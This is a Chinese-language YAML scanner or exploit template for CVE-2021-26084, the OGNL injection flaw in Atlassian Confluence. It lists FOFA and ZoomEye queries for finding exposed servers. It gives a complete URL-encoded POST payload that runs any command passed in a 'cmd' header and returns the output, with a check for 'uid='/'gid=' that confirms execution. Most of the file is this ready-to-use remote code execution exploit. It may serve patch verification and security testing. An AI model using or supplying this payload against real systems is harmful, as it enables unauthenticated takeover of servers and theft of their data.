product: Atlassian-Confluence
vName: Atlassian-Confluence doenterpagevariables.action OGNL表达式注入
type: 代码执行
vID:
  - CVE-2021-26084
level: 3
vDesc: Atlassian Confluence是企业广泛使用的wiki系统，其部分版本中存在OGNL表达式注入漏洞。攻击者可以通过这个漏洞，无需任何用户的情况下在目标Confluence中执行任意代码。
version: ''
note: ''
search:
  FOFA: app="ATLASSIAN-Confluence"
  ZoomEye: app:"Atlassian Confluence"
protocol: http
link: https://github.com/Threekiii/Awesome-POC/blob/master/Web应用漏洞/Atlassian Confluence OGNL表达式注入代码执行漏洞 CVE-2021-26084.md
fix:
  - 建议联系软件厂商进行处理。
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /pages/doenterpagevariables.action
      data: queryString=%5Cu0027%2B%23%7B%5Cu0022%5Cu0022%5B%5Cu0022class%5Cu0022%5D.forName%28%5Cu0022javax.script.ScriptEngineManager%5Cu0022%29.newInstance%28%29.getEngineByName%28%5Cu0022js%5Cu0022%29.eval%28%5Cu0022var+c%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getRequest%28%29.getHeader%28%5Cu0027cmd%5Cu0027%29%3Bvar+x%3Djava.lang.Runtime.getRuntime%28%29.exec%28c%29%3Bvar+out%3Dcom.atlassian.core.filters.ServletContextThreadLocal.getResponse%28%29.getOutputStream%28%29%3Borg.apache.commons.io.IOUtils.copy%28x.getInputStream%28%29%2Cout%29%3Bout.flush%28%29%3B%5Cu0022%29%7D%2B%5Cu0027
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          header:
            value:
              - uid=
              - gid=
            logic: and